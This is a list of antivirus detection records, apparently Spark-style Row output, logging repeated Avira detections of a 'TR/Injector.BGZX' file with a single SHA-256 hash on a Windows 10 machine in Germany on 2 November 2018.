  Row(detection=Row(filename='avscan-20181102-061829-1618989f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061829-1618989F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055015-247b23d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055015-247B23D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061704-e388ede6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061704-E388EDE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051601-5bf82015', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051601-5BF82015', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062525-0dd14027', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062525-0DD14027', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061837-1ad039cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061837-1AD039CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060810-a535e1ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060810-A535E1AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053655-476d326a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053655-476D326A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051632-6ebfd5ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051632-6EBFD5AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062518-09b116ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062518-09B116AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061709-e60b83c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061709-E60B83C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051650-7934851d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051650-7934851D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061709-e62ded60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061709-E62DED60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055024-29e999dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055024-29E999DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053650-445f0271', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053650-445F0271', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062518-09d81f3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062518-09D81F3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061829-16099360', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061829-16099360', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053626-3647f027', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053626-3647F027', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054032-c8c4bf2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054032-C8C4BF2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061719-ec09b5fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061719-EC09B5FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055051-39cb8c4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055051-39CB8C4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053627-368655d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053627-368655D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e89c7e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E89C7E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051602-5c863135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051602-5C863135', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051611-61b4eba3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051611-61B4EBA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060852-be052f69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060852-BE052F69', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055306-8a4b021f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055306-8A4B021F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051650-791a9dba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051650-791A9DBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055348-a345a7e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055348-A345A7E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061726-f06eff7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061726-F06EFF7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061727-f0db4c4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061727-F0DB4C4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062533-129e9f8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062533-129E9F8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055304-891b7411', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055304-891B7411', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055045-3605fda9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-3605FDA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055354-a6a35ffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055354-A6A35FFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061818-0f43bbda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061818-0F43BBDA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062554-1f1a5377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062554-1F1A5377', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-01a1eeb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-01A1EEB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055003-1d150dac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055003-1D150DAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061817-0f10d9e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061817-0F10D9E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055327-96c35059', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055327-96C35059', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055353-a6231081', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055353-A6231081', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061737-f6e91341', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061737-F6E91341', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060815-a7dd3dd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060815-A7DD3DD4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055047-375729bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055047-375729BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055050-39416942', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055050-39416942', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055050-3935fcba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055050-3935FCBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053640-3ec217e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053640-3EC217E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061817-0f26c5f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061817-0F26C5F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061736-f6b32760', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061736-F6B32760', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055332-99b55a4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055332-99B55A4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061818-0f393dac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061818-0F393DAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055028-2c215d18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055028-2C215D18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061742-f9f80e71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061742-F9F80E71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053651-451f7618', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053651-451F7618', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:50Z'), dt=datetime.date(2018, 11, 2)),
